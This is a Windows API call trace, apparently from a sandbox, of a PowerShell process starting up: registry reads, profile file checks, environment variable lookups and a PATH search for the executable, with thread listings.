	[0671.814] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d7fc, lpData=0x0, lpcbData=0x24d7f8*=0x0 | out: lpType=0x24d7fc*=0x1, lpData=0x0, lpcbData=0x24d7f8*=0x56) returned 0x0
	[0671.814] CoTaskMemAlloc (cb=0x5a) returned 0x483d60
	[0671.814] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d7cc, lpData=0x483d60, lpcbData=0x24d7c8*=0x56 | out: lpType=0x24d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d7c8*=0x56) returned 0x0
	[0671.814] CoTaskMemFree (pv=0x483d60) 
	[0671.814] RegCloseKey (hKey=0x390) returned 0x0
	[0671.814] CoTaskMemAlloc (cb=0x20c) returned 0x1b8ba970
	[0671.814] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8ba970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0671.814] CoTaskMemFree (pv=0x1b8ba970) 
	[0671.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0671.814] CoTaskMemAlloc (cb=0x20c) returned 0x1b8ba970
	[0671.815] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8ba970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0671.815] CoTaskMemFree (pv=0x1b8ba970) 
	[0671.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0671.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0671.816] SetErrorMode (uMode=0x1) returned 0x1
	[0671.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d7e0 | out: lpFileInformation=0x24d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0671.816] SetErrorMode (uMode=0x1) returned 0x1
	[0671.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0671.816] SetErrorMode (uMode=0x1) returned 0x1
	[0671.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d7e0 | out: lpFileInformation=0x24d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0671.816] SetErrorMode (uMode=0x1) returned 0x1
	[0671.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0671.816] SetErrorMode (uMode=0x1) returned 0x1
	[0671.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d7e0 | out: lpFileInformation=0x24d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0671.817] SetErrorMode (uMode=0x1) returned 0x1
	[0671.817] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0671.817] SetErrorMode (uMode=0x1) returned 0x1
	[0671.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d7e0 | out: lpFileInformation=0x24d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0671.817] SetErrorMode (uMode=0x1) returned 0x1
	[0671.818] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.818] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.818] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.819] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.819] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.819] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.820] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.820] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.820] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.820] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.822] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0671.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0671.822] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.823] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0671.824] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24d9c0 | out: lpMode=0x24d9c0) returned 1
	[0673.495] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0673.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0673.495] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0673.499] SetEvent (hEvent=0x320) returned 1
	[0673.499] SetEvent (hEvent=0x390) returned 1
	[0673.499] SetEvent (hEvent=0x2f8) returned 1
	[0673.499] SetEvent (hEvent=0x318) returned 1
	[0673.501] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0673.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0673.501] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0673.501] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d718 | out: phkResult=0x24d718*=0x350) returned 0x0
	[0673.501] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d69c, lpData=0x0, lpcbData=0x24d698*=0x0 | out: lpType=0x24d69c*=0x0, lpData=0x0, lpcbData=0x24d698*=0x0) returned 0x2

Thread:
	id = 436
	os_tid = 0x10bc


Thread:
	id = 438
	os_tid = 0x10c4


Thread:
	id = 910
	os_tid = 0x184c


Thread:
	id = 911
	os_tid = 0x1850


Thread:
	id = 941
	os_tid = 0x1930


Thread:
	id = 978
	os_tid = 0x1a14


Thread:
	id = 979
	os_tid = 0x1a18

	[0522.594] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0617.591] LocalFree (hMem=0x437290) returned 0x0
	[0617.592] CloseHandle (hObject=0x318) returned 1
	[0617.592] CloseHandle (hObject=0x13) returned 1
	[0617.638] LocalFree (hMem=0x4372e0) returned 0x0
	[0617.638] RegCloseKey (hKey=0x320) returned 0x0
	[0617.638] CloseHandle (hObject=0xf) returned 1
	[0617.670] RegCloseKey (hKey=0x2f8) returned 0x0
	[0617.670] RegCloseKey (hKey=0x300) returned 0x0
	[0617.670] RegCloseKey (hKey=0x2fc) returned 0x0
	[0628.369] RegCloseKey (hKey=0x2fc) returned 0x0
	[0641.952] RegCloseKey (hKey=0x2fc) returned 0x0
	[0661.691] RegCloseKey (hKey=0x38c) returned 0x0
	[0661.691] RegCloseKey (hKey=0x388) returned 0x0
	[0661.691] RegCloseKey (hKey=0x364) returned 0x0
	[0661.692] RegCloseKey (hKey=0x3a0) returned 0x0
	[0661.692] RegCloseKey (hKey=0x380) returned 0x0
	[0661.692] RegCloseKey (hKey=0x37c) returned 0x0
	[0661.692] RegCloseKey (hKey=0x378) returned 0x0
	[0661.693] RegCloseKey (hKey=0x374) returned 0x0
	[0661.693] RegCloseKey (hKey=0x370) returned 0x0
	[0661.693] RegCloseKey (hKey=0x36c) returned 0x0
	[0661.694] RegCloseKey (hKey=0x368) returned 0x0
	[0661.694] RegCloseKey (hKey=0x340) returned 0x0
	[0661.694] RegCloseKey (hKey=0x39c) returned 0x0
	[0661.694] RegCloseKey (hKey=0x398) returned 0x0
	[0661.695] RegCloseKey (hKey=0x360) returned 0x0
	[0661.695] RegCloseKey (hKey=0x35c) returned 0x0
	[0661.695] RegCloseKey (hKey=0x358) returned 0x0
	[0661.695] RegCloseKey (hKey=0x354) returned 0x0
	[0661.696] RegCloseKey (hKey=0x350) returned 0x0
	[0661.696] RegCloseKey (hKey=0x34c) returned 0x0
	[0661.696] RegCloseKey (hKey=0x348) returned 0x0
	[0661.696] RegCloseKey (hKey=0x344) returned 0x0
	[0661.697] RegCloseKey (hKey=0x394) returned 0x0
	[0661.697] RegCloseKey (hKey=0x334) returned 0x0
	[0661.697] RegCloseKey (hKey=0x330) returned 0x0
	[0661.698] RegCloseKey (hKey=0x32c) returned 0x0
	[0661.698] RegCloseKey (hKey=0x328) returned 0x0
	[0661.698] RegCloseKey (hKey=0x324) returned 0x0
	[0661.699] RegCloseKey (hKey=0x320) returned 0x0
	[0661.699] RegCloseKey (hKey=0x318) returned 0x0
	[0661.699] RegCloseKey (hKey=0x2f8) returned 0x0
	[0661.699] RegCloseKey (hKey=0x390) returned 0x0
	[0661.700] RegCloseKey (hKey=0x2fc) returned 0x0
	[0700.063] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 1049
	os_tid = 0x1bf4


Thread:
	id = 1329
	os_tid = 0x1e14

	[0675.216] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0675.222] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0675.226] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0675.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.227] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0675.228] VirtualQuery (in: lpAddress=0x1c81dd60, lpBuffer=0x1c81ec20, dwLength=0x30 | out: lpBuffer=0x1c81ec20*(BaseAddress=0x1c81d000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0675.232] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0675.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.232] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0675.234] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0675.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.235] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0675.238] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0675.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0675.238] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.829] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.829] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.832] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.832] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.833] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.834] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.839] VirtualQuery (in: lpAddress=0x1c81e010, lpBuffer=0x1c81eed0, dwLength=0x30 | out: lpBuffer=0x1c81eed0*(BaseAddress=0x1c81e000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0676.840] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.840] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.843] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.843] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.843] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.843] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.845] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.845] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0676.849] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0676.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.849] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.504] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.504] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.507] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.507] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.508] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.508] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.511] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.511] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.512] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.513] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.514] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.514] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0680.516] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0680.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.516] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0682.125] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0682.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0682.125] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0686.361] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0686.361] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0686.361] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0686.364] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0686.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0686.364] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0686.364] CoTaskMemAlloc (cb=0x128) returned 0x42bf10
	[0686.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x42bf10, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0686.364] CoTaskMemFree (pv=0x42bf10) 
	[0686.369] CoTaskMemAlloc (cb=0x20e) returned 0x1b8bc5e0
	[0686.369] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8bc5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0686.369] CoTaskMemFree (pv=0x1b8bc5e0) 
	[0686.374] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0686.375] SetErrorMode (uMode=0x1) returned 0x1
	[0686.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0686.389] SetErrorMode (uMode=0x1) returned 0x1
	[0686.391] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0686.391] SetErrorMode (uMode=0x1) returned 0x1
	[0686.391] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.315] SetErrorMode (uMode=0x1) returned 0x1
	[0688.316] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.316] SetErrorMode (uMode=0x1) returned 0x1
	[0688.316] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.325] SetErrorMode (uMode=0x1) returned 0x1
	[0688.326] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.326] SetErrorMode (uMode=0x1) returned 0x1
	[0688.326] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.334] SetErrorMode (uMode=0x1) returned 0x1
	[0688.336] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.336] SetErrorMode (uMode=0x1) returned 0x1
	[0688.336] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.344] SetErrorMode (uMode=0x1) returned 0x1
	[0688.345] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.345] SetErrorMode (uMode=0x1) returned 0x1
	[0688.346] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.754] SetErrorMode (uMode=0x1) returned 0x1
	[0689.755] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.755] SetErrorMode (uMode=0x1) returned 0x1
	[0689.756] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c81df40 | out: lpFindFileData=0x1c81df40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
